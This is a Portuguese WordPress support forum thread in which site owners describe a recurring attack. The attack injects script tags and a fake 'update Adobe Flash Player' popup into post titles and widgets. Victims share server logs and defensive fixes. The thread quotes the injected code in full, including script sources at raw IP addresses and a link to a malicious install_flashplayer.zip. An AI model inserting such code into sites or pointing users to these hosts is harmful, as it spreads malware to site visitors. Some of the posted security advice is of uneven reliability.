Código insere script no título das notícias, para download do Flash Player
-
Bom dia
Estou com um problema no meu site wordpress. Algum código está inserindo automaticamente o seguinte script nos títulos das minhas notícias.
<script src="http://64.207.152.178/br/flashplayer/download"></script>
Pelo que me parece, essa inserção ocorre automaticamente, independente de uma ação minha. Talvez esteja relacionado com algo no cron.
Sempre que isso ocorre, tenho que ir no meu banco mySQL e buscar pelo código citado, apagando item por item.
Se eu não faço isso, o site avisa que preciso baixar o plugin flash e me redireciona automaticamente para o endereço dentro do código.
Meu site é http://www.previdenciarista.com
Agora ele está funcionando pois apaguei as entradas.
Alguém já viu isso?
-
Sempre vejo pessoas que usam temas ou plugins que utilizam TimThumb sendo atacados desta forma.
Tente usar esse plugin aqui: http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/E delete tudo o que ele encontrar que usa TimThumb.
Esse ataque geralmente troca coisas no seu
.htaccess
,index.php
, adiciona essas linhas no seu banco de dados na frente de nome de posts, imagens e etc.No caso vai ser bem complicado limpar a infecção, mas é possível.
Caros,
O meu site está com mesmo problema. Analisando o log do servidor, achei as seguintes entradas:
143.107.112.2 [15/May/2013:01:22:59 GET / HTTP/1.1
143.107.112.2 [15/May/2013:01:23:43 POST ///wp-login.php HTTP/1.1
143.107.112.2 [15/May/2013:01:23:45 GET //wp-admin/theme-editor.php HTTP/1.1
143.107.112.2 [15/May/2013:01:23:53 GET //wp-admin/widgets.php HTTP/1.1
143.107.112.2 [15/May/2013:01:24:09 GET //wp-admin/edit.php HTTP/1.1
143.107.112.2 [15/May/2013:01:24:30 GET / HTTP/1.1
143.107.112.2 [15/May/2013:01:24:50 GET //wp-admin/edit.php?s=CONSELHO%20NACIONAL%20DE%20JUSTI%C3%87A%20DETERMINA%20QUE%20CART%C3%93RIOS%20REALIZEM%20CASAMENTOS%20HOMOAFETIVOS HTTP/1.1
143.107.112.2 [15/May/2013:01:25:04 GET //wp-admin/edit.php?s=PROCESSOS%20DECIDIDOS%20PELO%20PRINC%C3%8DPIO%20DA%20INSIGNIFIC%C3%82NCIA%20MOVIMENTAM%20TRIBUNAL%20SUPERIOR HTTP/1.1
143.107.112.2 [15/May/2013:01:25:18 GET /wp-admin/post.php?post=14443&action=edit HTTP/1.1
Isso ocorreu várias vezes ao longo do mês e partiu sempre da mesma máquina fazendo a mesma sequencia de páginas. Trocar a senha não adianta, já fiz isso e mesmo não revelando a ninguém, o problema ocorreu. A máquina que faz o ataque pertence à USP, já entrei em contato com eles. O invasor envia este header de informação:
Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Como ele usa o firefox, desconfio que seja um script abrindo o navegador e atacando várias máquinas ao mesmo tempo, ou então, uma pessoa acessando remotamente, vai saber..
Minha sugestão: Bloquear ips de acesso. Trocar a pasta wp-admin.
Olá.
Apresento o mesmo problema que os colegas acima tem…
O que eu havia feito era ter alterado a senha do Banco de dados, para uma aleatória, e aparentemente havia resolvido…
Entretanto eu vou fazer o Backup dos arquivos e das imagens, alterar a senha do banco, proibir o envio de scripts… E vamos ver se vai parar…
E todos esses IPS, já passaram por aqui, seria um ataque interno isso?
Pessoal, tenho o mesmo problema há vários meses.
Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script>
O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.
O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.
Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novoPercebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.
E novamente… apresentou problema…
Não ligo de remover os scripts, mas isso afunda minhas parcerias…
Para quem está com problema… Adicionem ao WP config:
define( ‘DISALLOW_UNFILTERED_HTML’, true );
Vai diminuir os ataques. Alterem a senha do Banco e eu habilitei o WP Sentinel também, ele vai bloquear ataque… Vamos ver se funciona… È sempre por volta da madrugada que isto acontece.
Pessoal,
Esse tipo de ataque (code injection) geralmente é feito através de vulnerabilidades em plugins e temas. São centenas de milhares de plugins criados e distribuidos por qualquer um e fica praticamente impossível acompanhar todas as formas de proteger o seu site WordPress, certo?
Bom, aqui vai um pequeno trecho de código que bloqueia o acesso direto a arquivos PHP dentro dos plugins e temas. Na prática, isso deveria ser prevenido pelo próprio plugin, usando funções que o WP disponibiliza para deixar o plugin mais seguro, mas, nem todos fazem.
Atenção, o código abaixo pode fazer com que algum plugin tenha alguma função bloqueada, caso ele utilize acesso direto aos arquivos PHP pelo usuário. Ao identificar algo assim, substitua o plugin por outro com a mesma funcionalidade.
O código abaixo deve ser colocado num arquivo .htaccess dentro da pasta wp-content:
## REMOVE ACCESS TO NO-ASSETS FILES order deny,allow deny from all <files ~ ".(xml|css|jpe?g|png|gif|js)$"> allow from all </files>
Caso tenham interesse, eu ofereço pacotes de limpeza e segurança para WordPress. Basta entrar em contato [at] tecnocracia.net.
Fiz uma limpeza geral e ainda tive por 3 vezes quinta, sexta e hoje {25} outro ataque…
Apliquei as informações dos colegas acima, vou esperar, não sei mais o que fazer…
Ah! Outra dica:
Alguns malwares se aproveitam de cookies do usuário para distribuir infecção. Então, se o seu site está 100% fechado e protegido e mesmo assim códigos continuam aparecendo nos seus posts ou widgets, uma das razões pode ser a infecção local de um usuário com poderes de acesso ao wp-admin.
Funciona assim: você está logado no seu wordpress e tem poder de author ou de admin. Ao acessar um site que esteja infectado, você mesmo (sem saber, óbvio) atualiza um dos últimos posts e adiciona o script no título ou num widget. Também pode acontecer de o malware estar instalado localmente em sua máquina, após ter baixado e instalado o falso plugin de flash.
Sempre eliminem todas as possibilidades antes de pirar, porque mesmo depois de tudo isso, o problema pode estar no hosting e o ataque estar sendo feito diretamente no mySQL ou através de um outro tipo de invasão ao servidor.
Don’t panic. Eliminando as possibilidades, uma a uma, você finalmente vai descobrir qual o problema e, no caminho, vai aprender um monte sobre segurança no WordPress. 😉
Abraço e boa sorte
Tentei o que o Manoel disse, e perdi o acesso ao site inteiro hehe.
Aqui funciona desta forma, eu altero a senha do banco, tenho paz por uns 3 dias e depois volta…
Pneso que seja atauqe direto ao banco, já que seria uma forma de contronar o filtro do HTML…
Bem, já estou ficando desanimado já…
Olá pessoal.
Tenho o mesmo problema em alguns sites WP. Fiz alguns ajustes recomendados pelos colegas aqui do fórum mas sem sucesso. Hoje criei o .htaccess dentro da pasta wp-content que o colega Manoel recomendou, vamos ver no que dá.
Um detalhe: Administro um site em conjunto com outra pessoa. Quando tudo começou, a primeira infecção, o acesso da outra pessoa era ADMINISTRADOR, então o site foi infectado no INDEX.PHP e também foram criados WIDGETS. Eliminei na unha todos os scripts e depois de um tempo eles voltavam nos mesmo lugares. Então resolvi mudar o acesso desse meu amigo, passei para EDITOR, pois é isso que ele faz. Agora o site é infectado com o script apenas no titulo do ultimo post… Será coincidência? Ou o problema está com o PC do meu amigo?
E mais, ele administra outros sites WP, e adivinhem… 3×4 ele me pede para remover os scripts pra ele.
Tenho mais outros 3 sites que só eu tenho acesso, e nenhum deles foram infectados…
Bom, na minha opnião está obvio que a infecção se dá pelo computador infectado pelo virús, resta saber como impedir que ele faça a mudança no site… Pois é mai dificil convencer que a outra pessoa está com o PC ferrado…
Abçs
Tive os mesmos acessos que o colega MHOKANO,
143.107.112.2 – – [28/May/2013:07:48:03 -0300] “GET / HTTP/1.1” 200 29951 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 219 30162 11.183 BYPASS
143.107.112.2 – – [28/May/2013:07:48:13 -0300] “POST ///wp-login.php HTTP/1.1” 302 0 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 437 821 2.822 –
143.107.112.2 – – [28/May/2013:07:48:25 -0300] “GET //wp-admin/theme-editor.php HTTP/1.1” 500 4139 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 490 4422 5.780 BYPASS
143.107.112.2 – – [28/May/2013:07:48:31 -0300] “GET //wp-admin/widgets.php HTTP/1.1” 500 4139 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 485 4422 0.854 BYPASS
143.107.112.2 – – [28/May/2013:07:48:50 -0300] “GET //wp-admin/edit.php HTTP/1.1” 200 92632 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 482 93238 15.153 BYPASS
143.107.112.2 – – [28/May/2013:07:49:14 -0300] “GET / HTTP/1.1” 200 35732 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 601 36054 5.966 BYPASS
143.107.112.2 – – [28/May/2013:07:49:32 -0300] “GET //wp-admin/edit.php?s=Origem%20do%20Cimento%20Portland HTTP/1.1” 200 46053 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 654 46404 5.866 BYPASS
143.107.112.2 – – [28/May/2013:07:50:13 -0300] “GET /wp-admin/post.php?post=756&action=edit HTTP/1.1” 200 111481 “-” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 642 111780 18.373 BYPASS
143.107.112.2 – – [28/May/2013:07:50:21 -0300] “POST //wp-admin/post.php HTTP/1.1” 302 0 “http://resdilcimento.com//wp-admin/edit.php” “Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15” “-” 2159 366 2.210 –Galera, hoje pela madrugada aconteceu comigo. O código que apareceu foi bem diferente, esse: `<script type=”text/javascript”>
$(document).ready(function() {
uLightBox.init({
override:false,
background: ‘black’,
centerOnResize: true,
fade: true
});
{
uLightBox.alert({
width: ‘585px’,
title: ‘Para Continuar Atualize o Adobe@ Flash Player’,
rightButtons: [‘Instalar’],
opened: function() {
$(‘<span />’).html(“<a style=’border:0;’ onClick=’uLightBox.clear();’ href=’http://juslog.com.br/Plugins/popup/install_flashplayer.zip’ target=’_blank’><img src=’./popup/flash-player.png’></a>”).appendTo(‘#lbContent’);
},
onClick: function(button) {
uLightBox.clear();
location = “http://juslog.com.br/Plugins/popup/install_flashplayer.zip”;
}
});}
});
</script>`Mas além desse código, apareceu uma pasta chamada POPUP no FTP. E quando eu tentava excluí-la, dava erro tanto no FTP, quanto no gerenciador de arquivos da minha hospedagem. Vejam se vocês não estão com essa pasta também, porque nela está o código malicioso.
Se você foi atacado, você pode antes de tudo trocar os <?php the_title(); ?> do tema por <?php echo strip_tags(get_the_title()); ?>. Isso vai fazer com que códigos HTML inseridos nos títulos de posts não cheguem até o usuário final. É uma medida paliativa, mas vai segurar um pouco enquanto você faz um checklist de segurança e limpa o seu WordPress, ok?
Esse tipo de vulnerabilidade acontece principalmente por conta do prefixo da tabela do WordPress, que a maioria dos sites usa a padrão “wp_” e por plugins que possuem falha de segurança. O mais importante é atualizar o sistema (wordpress, theme e plugins), trocar o prefixo da tabela de “wp_” para outro e seguir os procedimentos de segurança de alguns plugins como o Better Wp Security ou Wp Security Scan.
Será necessário remover o código direto no banco, depois de efetuar esses procedimentos, você precisa procurar pelo código nos posts e widgets e remover manualmente um a um ou usando uma busca com sql, como alguns já comentaram por aqui.
Se precisar de um trabalho mais avançado de limpeza e segurança para WP, entre em contato comigo pelo richard [@] homemmaquina.com.br.
Abração e espero que seja útil.
se for em um arquivo alterem a permissão dele para 400 q irá resolver. N tenho os plugins citados e tb estou tendo o mesmo problema, sempre q apago ele volta nos widgets…
Oi Pessoal, vem acontecendo o mesmo comigo, sou meio leigo no assunto mas tenho resolvido alguns problemas em meu site, mas este do script não consegui, sempre gera um nos Títulos, eu utilizo o plugins Akismet mas não sei o que fazer.
- O tópico ‘Código insere script no título das notícias, para download do Flash Player’ está fechado para novas respostas.